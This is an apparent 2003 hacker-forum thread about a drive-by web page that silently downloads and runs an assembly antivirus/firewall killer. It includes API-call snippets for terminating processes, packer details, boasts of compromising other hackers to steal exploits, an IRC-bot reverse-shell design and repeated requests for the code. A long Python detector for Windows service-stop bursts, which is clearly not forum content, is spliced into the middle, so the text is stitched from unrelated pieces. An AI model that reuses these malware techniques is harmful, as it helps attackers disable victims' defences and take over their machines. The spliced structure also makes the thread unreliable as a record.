http://illmob.netfirms.com/aim.html this will download and execute my new firewall / antivirus killer (only 4.87kb, made in assembly) and it will execute it without Norton picking up the script as a virus before the page is even opened
clubfed
Oct 1 2003, 12:23 PM
I did something like this about two months ago - which is half of why I have had the most advanced owning technique -- I rooted several *dozen* well-known hackers with similar code (and I scored a great deal of unreleased 0day exploits this way) (ironically including an unreleased *new* IE exploit). I wrote my own AV/FW killer in win32asm that also downloads a larger, more advanced egg. The advanced code can circumvent even application proxy gateways and some hardware firewalls (if you are familiar with configuring these, you know the _certain_ traffic I'm referring to that can't really be blocked and protocol inspecting is impossible).
However I think it's amoral and truly a *bad idea* to just spoon-feed others with less skill and give them this much power without them learning how to do it for themselves. Think of some malicious and angry person who comes here and grabs this code and goes and roots your mother, or other family members, or your friends, or some company/group/etc you like and care about. More skill doesn't always equate with more responsibility, but truly handing out packaged weapons to the uninitiated is just begging for disaster.
Illwill, please reconsider packaging bugtraq exploits for the masses. The problem is bad enough as it is. If people can't figure this stuff out, then thank goodness! This bug will last for years (in some cases) so let them catch the scraps!
For your consideration,
illwill
Oct 1 2003, 12:54 PM
ok well said. removed the page.
cartman
Oct 1 2003, 01:14 PM
stupid
illwill
Oct 1 2003, 11:29 PM
yes, I'm so hurt by someone who names himself after a fat cartoon character
mortello
Oct 2 2003, 02:51 AM
I do not know how to do such an app, but I must admit this is a great idea (to remove) since I don't think I should be able to use such a powerful tool.
Use it for yourself... at least you won't have lost it entirely.
zadium
Oct 2 2003, 04:32 AM
can you kindly send the exploit this way? send it to mumin786@hotmail.com, cheers
gravyboy
Oct 2 2003, 05:55 AM
Argh, what about those of us who understand it and want a look?! I got home from work looking forward to seeing what you had done and now it's gone!
I thought this was the purpose of this forum.
Is there some other way I can see it? Is it the same as the Iexplorer Windows Media thing posted last week?
I would appreciate a PM with another link or the code if it's not too much trouble.
-gravyboy
illwill
Oct 2 2003, 01:36 PM
yea it was the media one
gravyboy
Oct 2 2003, 04:58 PM
Thanks
atf
Oct 2 2003, 07:36 PM
PM the info here too, I just don't want to go through 100 posts to see the gory details
Yorn
Oct 2 2003, 08:33 PM
QUOTE
yes, I'm so hurt by someone who names himself after a fat cartoon character
well put.
What ASM utilities do you use? And how big is it after UPX?
clubfed
Oct 2 2003, 09:58 PM
To answer the question about size, I don't use UPX, I use FSG:
The "large" size is because of all the strings for the various AV/FW out there.
My killing technique is not amazing, it's pretty standard:
invoke CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0
...
invoke OpenProcess, PROCESS_TERMINATE, 0, Process.th32ProcessID
invoke TerminateProcess, eax, 0
toska
Oct 3 2003, 04:39 AM
can someone PM the info here too? Thanks
Yorn
Oct 3 2003, 01:25 PM
QUOTE (clubfed @ Oct 2 2003, 09:58 PM)
The "large" size is because of all the strings for the various av/fw out there.
The large size? I'm not knocking it at all. In fact, it's the smallest one I've seen so far. I was just wondering if you used UPX to compress it. FSG is nice for ASM code since it's already pretty small. I should get a hold of you about other changes you can make to be certain it's a LONG time before they get their AV and firewall software fixed.
It's a really interesting concept and would throw all the AV software companies into a frenzy over how to deal with it. A few others have done it before, but I still consider it new cause it's never been done *right*.
illwill
Oct 3 2003, 05:50 PM
wow clubfed, your code looks eerily similar to the code I released last year... http://illmob.netfirms.com/killer_src.html could I be mistaken? besides, this new code I made also stops 400 service names, which as you should know is needed because service exes can't be killed unless the service is stopped first... hence the 11kb unpacked and 4.87kb packed, but don't worry, this source code will be released a few weeks from now, then you can make a new one for yourself.
Yorn
Oct 4 2003, 02:36 AM
QUOTE (illwill @ Oct 3 2003, 05:50 PM)
hence the 11kb unpacked and 4.87kb packed, but don't worry, this source code will be released a few weeks from now, then you can make a new one for yourself.
I'll probably take a look at it when you release it.
I've never really had a reason to disable AV. The way I figure it, the less attention I draw, the better. There are plenty of tools out there that don't get recognized, and the tools I make myself *never* get recognized.
Ironically, I don't think I've ever seen an effective AV/firewall killer *under* 5k, so I'm pretty impressed with that aspect of it. It also makes me wonder how large an AV killer would be that kills just the Norton and McAfee AV scanners, since those two are the most widely used on those fat corporate lines.
Illwill, have you ever thought about or made an IRC bot so users could get around firewalls and initiate the connection via IRC? I've done some theorizing on making a bot that would connect to a possible 30 or so irc chat rooms on various servers randomly. Then for the person doing the compromising they would have another bot that would connect to all 20 or so of those chat channels on IRC and just sit.
The trigger for the bot would be an "on join" response. If a person came into the channel, the bot would automatically try to connect to that remote user on a specified port. The owner of all the bots would code his bot to listen on that same port and, when he/she joins the 20 or so chat rooms, will start accepting each of those connections as they drop to shell.
I've also done some testing with coordinating bots without an IRC network in a sort of point-2-point protocol aspect. Imagine something like that being up 24/7. Yikes. Anyone could potentially use it too.
clubfed
Oct 4 2003, 06:17 PM
just kill Norton and McAfee? without any optimization, just butchering the code I have here down to those two, it's:
10/04/2003 11:14 AM 1,616 avfrown_small_nav_mcafee.exe
And I'm sure that could be reduced quite a bit.
illwill
Oct 4 2003, 07:53 PM
it sure can. I get 1024 bytes or 1kb, can't beat that with a bat
toska
Oct 4 2003, 09:19 PM
anyone got the source code of illwill's page (http://illmob.netfirms.com/aim.html) before it was removed? If so, please contact me (PM). 10x!
I am hoping your new AV/FW killer uses something other than exec'ing "NET" each time you kill a process... all those net processes were bad enough when you were only killing four services in your killer.asm, but 300 would be a heavy load on the system. What are you using now? :)
what
Oct 5 2003, 06:36 PM
QUOTE
We can generally guess what is going on here. As .hta or "HTML Application" files are not binary and resemble - mechanically - HTML files, IE's check of content will be unable to return that this file is anything but safe. The second check of MIME type will see that we are requesting a safe file type... and the third check of MIME type will be from the server saying this is a HTML Application. For whatever reason, IE has ignored the returned MIME type from a security context, but paid attention to it from an execution context.
I found this here. Now that Microsoft has applied the patch, exactly what does the patch do? Does it add another form of checking, deny HTML Application types, or am I way off? Just wondering, because it seemed that just as I got it to work on my webserver, a patch came out, and now nothing works.
Yorn
Oct 8 2003, 04:05 AM
what,
That is for the PERL HTA exploit that I wrote. It's basically a security risk assessment that was written when this exploit first came out.
GhostCow
Oct 11 2003, 03:30 PM
illwill, can you post that AV killer? it sounds like an interesting piece of code... do you also have an AV killer for Linux and Unix firewalls?
illwill
Oct 12 2003, 03:15 AM
no, just for Windows, and yes, my new one doesn't use the lazy code that ShellExecutes "net stop" for the apps listed; it enumerates which service names are running, then compares them with the list of names to kill, then stops that service name
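A detection-side counterpart, added here as an example and not code from any poster in this thread: the behaviour illwill describes (enumerate the running services, stop every one whose name is on a list) leaves a burst of Service Control Manager Event ID 7036 "entered the stopped state" records in the System log, and Event ID 7040 when a start type is changed to disabled. The script below parses constructed sample log lines in that shape and raises one alert per host where three or more distinct security services stop or are disabled within ten seconds, which separates a list-driven kill from an admin restarting a single product. Host names, service names and timestamps are constructed, and the product-name hints in SECURITY_SERVICE_HINTS are an assumption a real deployment would replace with the exact service names it has installed.

```python
"""Detect bursts of security-service stops in Windows System-log events.

Added example, not code from this thread. Models the defender's view of a
tool that stops every service on a kill list: each stop is logged by the
Service Control Manager as Event ID 7036, each start-type change to
"disabled" as Event ID 7040. All sample data below is constructed.
"""
import re
from collections import deque
from datetime import datetime, timedelta

# Assumption: substrings that identify security products in service names.
# A real deployment would list the exact service names installed in the fleet.
SECURITY_SERVICE_HINTS = ("antivirus", "firewall", "defend", "endpoint")

# Constructed sample lines in the shape "timestamp host EventID message".
SAMPLE_LOG = """\
2003-10-03 17:50:01 HOST1 7036 The Print Spooler service entered the running state.
2003-10-03 17:50:02 HOST1 7036 The ExampleAntivirus service entered the stopped state.
2003-10-03 17:50:02 HOST1 7036 The ExampleFirewall service entered the stopped state.
2003-10-03 17:50:03 HOST1 7036 The ExampleEndpointAgent service entered the stopped state.
2003-10-03 17:50:03 HOST1 7040 The start type of the ExampleAntivirus service was changed from auto start to disabled.
2003-10-03 18:30:00 HOST2 7036 The ExampleFirewall service entered the stopped state.
2003-10-03 18:45:00 HOST2 7036 The ExampleFirewall service entered the running state.
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) (?P<eid>\d+) (?P<msg>.*)$"
)
STOP_RE = re.compile(r"^The (?P<svc>.+?) service entered the stopped state\.$")
DISABLE_RE = re.compile(
    r"^The start type of the (?P<svc>.+?) service was changed from .+ to disabled\.$"
)


def is_security_service(name):
    """True when the service name contains one of the product hints."""
    lowered = name.lower()
    return any(hint in lowered for hint in SECURITY_SERVICE_HINTS)


def parse(log_text):
    """Yield (timestamp, host, service, kind) for SCM stop/disable events."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        eid = int(m["eid"])
        if eid == 7036:
            svc_match, kind = STOP_RE.match(m["msg"]), "stopped"
        elif eid == 7040:
            svc_match, kind = DISABLE_RE.match(m["msg"]), "disabled"
        else:
            continue
        if svc_match:  # "entered the running state" lines fall through here
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            yield ts, m["host"], svc_match["svc"], kind


def detect_service_kill_bursts(log_text, threshold=3, window=timedelta(seconds=10)):
    """Return one alert per host where >= threshold distinct security
    services were stopped or disabled within `window` of each other."""
    per_host = {}
    for ts, host, svc, kind in parse(log_text):
        if is_security_service(svc):
            per_host.setdefault(host, []).append((ts, svc, kind))

    alerts = []
    for host, events in per_host.items():
        events.sort()
        recent = deque()  # sliding window of (timestamp, service)
        for ts, svc, kind in events:
            recent.append((ts, svc))
            while recent and ts - recent[0][0] > window:
                recent.popleft()
            distinct = {s for _, s in recent}
            if len(distinct) >= threshold:
                alerts.append({"host": host, "end": ts, "services": sorted(distinct)})
                break  # one alert per host is enough for triage
    return alerts


if __name__ == "__main__":
    for a in detect_service_kill_bursts(SAMPLE_LOG):
        print(f"{a['host']}: {len(a['services'])} security services stopped/disabled "
              f"by {a['end']:%H:%M:%S}: {', '.join(a['services'])}")
```

On the constructed sample, HOST1 trips the rule (three products within two seconds) while HOST2's single firewall restart does not. Feeding it real System-log exports means mapping your exporter's timestamp and field layout onto LINE_RE and replacing the hint list with the service names you actually run.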
Demacus
Jan 14 2004, 08:26 PM
what's up everyone, I'm new here, just signed up a couple days ago. this is my first post, so if I'm noobish that's why. illwill, I've been checking your site out for the last 5 - 6 months and I've been trying to grab that AV/FW killer you posted about on your site, saying it was here. just wondering if you were ever gonna get it back on your site? it sounds like a kick ass killer, give me a shout. later on